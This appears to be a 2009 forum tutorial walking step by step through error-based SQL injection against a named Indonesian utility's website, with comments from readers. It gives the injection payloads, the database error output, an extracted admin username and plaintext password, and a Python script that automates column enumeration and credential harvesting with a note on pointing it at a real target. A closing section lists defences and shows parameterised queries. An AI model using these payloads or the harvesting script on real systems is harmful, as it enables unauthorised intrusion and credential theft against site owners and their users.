Breaking the Web with Step-by-Step SQL Injection
Submitted by ArBoy on Sun, 18/10/2009 - 15:54

As of March 2006 there were still web sites in Indonesia that could be broken into with SQL injection
techniques. Do you know how dangerous this one bug is? Here we present a step-by-step SQL injection,
taken directly from the writings of iko (iko94@yahoo.com).

Note: the discussion is limited to SQL injection against MS SQL Server.


We take as our example the site www.pln-wilkaltim.co.id

There are two weaknesses in this site, namely:

1. The news table
2. The admin table

The first step is to determine which holes can be injected, by enumerating the
input paths the site uses. We find two kinds of input parameter: values entered
through an input box, and values passed in the URL address.

We take the easiest one first, the input box, so we look for the admin login form.
It is found at www.pln-wilkaltim.co.id/sipm/admin/admin.asp
To determine the table name and its fields, we inject the NIP box with the command
(the password can be anything, leave the branch blank):
' having 1=1 --
Do not forget to write the single quote and the double hyphen (important).
The quote closes the string literal the application builds around our input and the
double hyphen comments out the rest of its query; the meaning of these two characters
is explained in the SQL injection tutorial on www.neoteker.or.id (see the archives above).
Then the following error message comes out:
Then will come out error message:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
Our first field name is out!
Write down the table name: T_ADMIN
Write down the field name: NOMOR

Next we find the names of the remaining fields (the table name is reported
with each one and may differ, so note it every time).
We inject the NIP box (password can be anything) with:
' group by T_ADMIN.NOMOR having 1=1 --
The following error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
This gives us the table name and our second field.
Note: T_ADMIN.NIP

Then we find the third field:
' group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1=1 --
The following error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------
Write down the third field: T_ADMIN.PASSWORD

Repeat the step above, adding each newly reported column to the GROUP BY list,
until we find the last field. Each error names exactly one column that is not yet
in the list, so the list grows by one column per request.

Here is the message that comes out when we check the last field with the injection:
' group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD, T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAIL having 1=1 --
(note: the whole command must be on one line, not cut)
-------
- NIP or Password or your unit is wrong!! --
-------
Success! We have found the last field: no column error this time, only the
application's own "wrong login" message, which means every column of the select
list is now in the GROUP BY.
List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
There is only one table for this authentication (ie T_ADMIN), which makes our
work easier.

Next we determine the data type of each of the fields above.

We inject the NIP box (password can be anything) with:
' union select sum(NOMOR) from T_ADMIN --
The idea of this query: SQL Server evaluates sum() before it checks whether the
two halves of the UNION have the same number of columns. sum() only accepts
numeric arguments, so on a non-numeric column we get an error that tells us the
column's type, while on a numeric column we only get the UNION column-count error.
Error message:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
-------
So the NOMOR column is numeric.

Next we inject:
' union select sum(NIP) from T_ADMIN --
The following error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
-------
This means the NIP column is of type char.
We repeat the command for each of the remaining columns, substituting the
column name for nama_kolom:
' union select sum(nama_kolom) from T_ADMIN --
We end up with the types of all 7 columns:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Next we search for the contents of the password field of the admin user, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a' --
This selects the smallest user name greater than 'a' and, because the first column
of the application's own query is an integer, SQL Server tries to convert that name
to int. The six 1s pad the UNION select list to seven expressions, the width of
T_ADMIN, so that only the NAMA column carries a value we care about and the other
six columns are ignored.
The following error message comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax
error converting the varchar value 'bill' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
-------
Look at:
varchar value 'bill'
'bill' is the NAMA value that min() returned, i.e. the alphabetically first user
name greater than 'a'. To walk the remaining names, repeat the query with
where NAMA > 'bill', then with the name that comes back, and so on until the
conversion error stops appearing.

Next we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill' --
(note: must be on one line, not cut)
The following error comes out:
-------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
-------
This means we have succeeded!
We get
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Please log in at:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account; the branch (unit) you can fill in by trial and error.

Or we use the shortcut ....

We inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill' --
(note: must be on a single line)
and the same conversion error hands us the branch code.
Duarrrrrr ..........
Glhodhak .............
Straight into the admin menu.
Remember: do not do damage! Tell the admin!
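The walk above is mechanical: each GROUP BY error names the next column, sum() reveals the type, and the int-conversion error reads back one value per request. The script below automates it. It is an added example, not part of the original write-up. Because the target is not available, a constructed FakeLogin class plays the vulnerable login page and returns the same SQL Server error strings the write-up reproduces; the rows in it (bill / m@mpusk@u plus a made-up second user) are sample data. It also goes one step beyond the text: dump_column walks every NAMA value with `where NAMA > '<last value>'` instead of stopping at the first.

```python
"""Automation of the error-based enumeration walk described above.

Added example, not code from the original write-up.  The target is replaced by
FakeLogin, a constructed stand-in for /sipm/admin/dologin.asp, so this runs
offline.  Against a real target, replace FakeLogin.send with a function that
submits the payload in the NIP field and returns the response body.
"""
import re

# Fragments of the three SQL Server messages the walk relies on.
COL_ERR = re.compile(r"Column '([\w.]+)' is invalid in the select list")
TYPE_ERR = re.compile(r"can ?not take a (\w+) data type as an argument")
UNION_ERR = re.compile(r"equal number of expressions in their target lists")
CONV_ERR = re.compile(r"converting the \w+ value '(.*?)' to a column of data type int")

WRONG_LOGIN = "- NIP or Password or your unit is wrong!! -"


def enumerate_columns(send):
    """Grow the GROUP BY list one column per request until the query stops erroring."""
    cols = []
    while True:
        payload = ("' group by " + ", ".join(cols) + " having 1=1 --") if cols else "' having 1=1 --"
        m = COL_ERR.search(send(payload))
        if not m:
            return cols  # no complaint left: every select-list column is grouped
        cols.append(m.group(1))


def infer_type(send, table, col):
    """sum() on a non-numeric column fails before the UNION arity check does."""
    body = send(f"' union select sum({col}) from {table} --")
    m = TYPE_ERR.search(body)
    if m:
        return m.group(1)
    return "numeric" if UNION_ERR.search(body) else "unknown"


def fetch_min(send, table, col, width, where):
    """min(col) over the rows matching `where`, read out of the int-conversion error."""
    pad = ",".join(["1"] * (width - 1))  # pad the select list to the table's width
    m = CONV_ERR.search(send(f"' union select min({col}),{pad} from {table} where {where} --"))
    return m.group(1) if m else None


def dump_column(send, table, col, width):
    """Walk every value of a text column with min(col) where col > <last value>."""
    values, last = [], ""
    while (nxt := fetch_min(send, table, col, width, f"{col} > '{last}'")) is not None:
        values.append(nxt)
        last = nxt
    return values


def harvest(send):
    """Columns, types and NAMA/PASSWORD pairs, in the order the write-up obtains them."""
    cols = enumerate_columns(send)
    table, names = cols[0].split(".")[0], [c.split(".")[1] for c in cols]
    types = {n: infer_type(send, table, n) for n in names}
    creds = {u: fetch_min(send, table, "PASSWORD", len(names), f"NAMA = '{u}'")
             for u in dump_column(send, table, "NAMA", len(names))}
    return cols, types, creds


class FakeLogin:
    """Constructed simulation of the vulnerable login page; not the real site."""
    ODBC = "[Microsoft][ODBC SQL Server Driver][SQL Server] "

    def __init__(self, table, columns, rows):
        self.table, self.columns, self.rows = table, dict(columns), rows

    def send(self, payload):
        names = list(self.columns)
        if "union" not in payload.lower():  # the GROUP BY probes
            grouped = re.findall(r"\w+\.\w+", payload)  # columns already listed
            if len(grouped) < len(names):
                return self.ODBC + (f"Column '{self.table}.{names[len(grouped)]}' is invalid in the "
                                    "select list because it is not contained in either an "
                                    "aggregate function or the GROUP BY clause.")
            return WRONG_LOGIN
        m = re.search(r"sum\((\w+)\)", payload)  # the type probes
        if m:
            t = self.columns[m.group(1)]
            if t == "numeric":
                return self.ODBC + ("All queries in an SQL statement containing a UNION operator "
                                    "must have an equal number of expressions in their target lists.")
            return self.ODBC + f"The sum or average aggregate operation cannot take a {t} data type as an argument."
        m = re.search(r"min\((\w+)\).* where (\w+) ([>=]) '(.*)' --", payload)  # the value reads
        col, wcol, op, val = m.groups()
        hits = [r[col] for r in self.rows if (r[wcol] > val if op == ">" else r[wcol] == val)]
        if not hits:
            return WRONG_LOGIN
        return self.ODBC + f"Syntax error converting the varchar value '{min(hits)}' to a column of data type int."


# Constructed table and rows; the column names and types are the ones the write-up found.
SITE = FakeLogin(
    "T_ADMIN",
    [("NOMOR", "numeric"), ("NIP", "char"), ("PASSWORD", "nvarchar"), ("NAMA", "char"),
     ("KD_RANTING", "char"), ("ADDRESS", "nvarchar"), ("EMAIL", "char")],
    [{"NAMA": "bill", "PASSWORD": "m@mpusk@u"}, {"NAMA": "sari", "PASSWORD": "rahasia1"}],
)

if __name__ == "__main__":
    for part in harvest(SITE.send):
        print(part)
```

Each request in the walk costs one round trip and leaks at most one column name, one type or one value, which is why hiding the database error text (item 3 in the admin notes at the end) breaks this particular technique outright.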

The second hole is in the news.

Basically the news content lives in another table, so we can still inject!
The difference is that we must supply the parameters in the URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
The URL carries the parameters id, idm and idSM. When we try injecting, only
the id parameter turns out to be affected (CMIIW).

We inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1 --
(in the browser the quote and spaces may need to be URL-encoded as %27 and %20)
The following error message comes out:
---------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server] Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------
This means 'tb_news.NewsId' is the name of our table and its first column.

Repeat the steps above (group by to list the columns, then sum() on each one for its type) until we get:

tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bits of data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, from here on it is your own work to develop your knowledge.
You could insert news items whose content you set yourself.

This is why these holes in MS SQL Server are so dangerous.

In my estimation, the party names on the Commission website that was hacked
by Shizoprenic also sat in database tables, so they too would have been
reachable by SQL injection like this.

******************************************************
SPECIAL FOR ADMIN & WEB PROGRAMMER!
******************************************************
Common ways to prevent this:
1. Limit the length of the input box (if possible) in the program code, so that
a beginner cracker is confused for a moment when the box will not take a long
command. This is only an obstacle: a length limit enforced in the browser is
bypassed by sending the request directly.
2. Filter the input entered by the user, especially single quotes (input
validation). Note that the numeric id parameter above needs no quote at all to
break out of the query, so the real fix is to pass user input to the database as
query parameters instead of pasting it into the SQL string.
3. Turn off or hide the error messages that come back from SQL Server; the whole
walk above depends on reading them.
4. Turn off standard facilities such as stored procedures and extended stored
procedures (xp_cmdshell being the classic example) where possible.
5. Change "Startup and run SQL Server" on the SQL Server Security tab to use a
low-privilege account.
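To make items 2 and 3 concrete, here is an added example (not the site's own ASP code, which the page does not show) of the two query shapes attacked above, each in its vulnerable and its hardened form. SQLite stands in for MS SQL Server and the table contents are constructed. The point is the contrast between pasting input into the SQL text and binding it as a parameter, and why stripping quotes on its own does nothing for the numeric id parameter.

```python
"""Vulnerable and hardened versions of the two query patterns the write-up attacks.

Added example, not code from the original site.  SQLite stands in for MS SQL
Server; the table and row contents are constructed sample data.
"""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE T_ADMIN (NOMOR INTEGER PRIMARY KEY, NIP TEXT, PASSWORD TEXT, NAMA TEXT);
        -- plaintext password, as on the target; a real application stores a hash
        INSERT INTO T_ADMIN VALUES (1, '19700101', 'm@mpusk@u', 'bill');
        CREATE TABLE tb_news (NewsId INTEGER PRIMARY KEY, Title TEXT);
        INSERT INTO tb_news VALUES (2119, 'Published story'), (2120, 'Unpublished draft');
    """)
    return con


DB = make_db()


def login_vulnerable(con, nip, password):
    """dologin.asp style: input pasted into the SQL text, database errors shown to the client."""
    sql = ("SELECT NOMOR, NAMA FROM T_ADMIN WHERE NIP = '" + nip
           + "' AND PASSWORD = '" + password + "'")
    try:
        return con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"DB error: {exc}"  # the leak the whole enumeration walk reads


def login_safe(con, nip, password):
    """Parameters travel separately from the SQL text, so quotes and -- are just data."""
    try:
        return con.execute("SELECT NOMOR, NAMA FROM T_ADMIN WHERE NIP = ? AND PASSWORD = ?",
                           (nip, password)).fetchone()
    except sqlite3.Error:
        return "NIP or Password or your unit is wrong!!"  # log the detail server-side only


def strip_quotes(value):
    """Remedy 2 from the list above, applied on its own."""
    return value.replace("'", "")


def news_vulnerable(con, id_param):
    """dari_Media.asp?id=... style: numeric parameter, so quote filtering does not help."""
    sql = "SELECT NewsId, Title FROM tb_news WHERE NewsId = " + strip_quotes(id_param)
    return con.execute(sql).fetchall()


def news_safe(con, id_param):
    """Validate the type first, then bind; anything that is not an integer is rejected."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    return con.execute("SELECT NewsId, Title FROM tb_news WHERE NewsId = ?", (news_id,)).fetchall()


if __name__ == "__main__":
    print(login_vulnerable(DB, "' or 1=1 --", "x"))  # logs in without knowing a password
    print(login_safe(DB, "' or 1=1 --", "x"))        # None: the payload is just a strange NIP
    print(news_vulnerable(DB, "2119 or 1=1"))        # every row, with no quote in the payload
    print(news_safe(DB, "2119 or 1=1"))              # []: not an integer, never reaches SQL
```

The same split applies in classic ASP with ADO: build an ADODB.Command with `?` placeholders and append Parameters objects, rather than concatenating the request fields into the SQL string as dologin.asp evidently does.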

Well, that's probably all I can tell you .....

It is a picture of how unsafe the Internet world is ...
If you want to be more secure, unplug your network cable, remove the disk
drive, remove your hard drive, and sell your computer!
Just kidding :)

Reference:
[+] SQL injection, www.BlackAngels.it
[+] Advanced SQL injection in SQL Server applications (www.ngssoftware.com)
[+] SQL injection walkthrough (www.securiteam.com)
Comments

Submitted by ArBoy on Thu, 20/10/2009 - 16:42.
#1
Surely you understand, right ...
wkwkwk
--
crazy ..

Submitted by anharku on Thu, 20/10/2009 - 13:49.
#2
Wow, thanks for the SQL injection info.
First post, bro!

Submitted by Kholis on Wed, 21/10/2009 - 04:52.
#3
Hahaha
I'll try it now.
Because my website isn't like that,
Database B
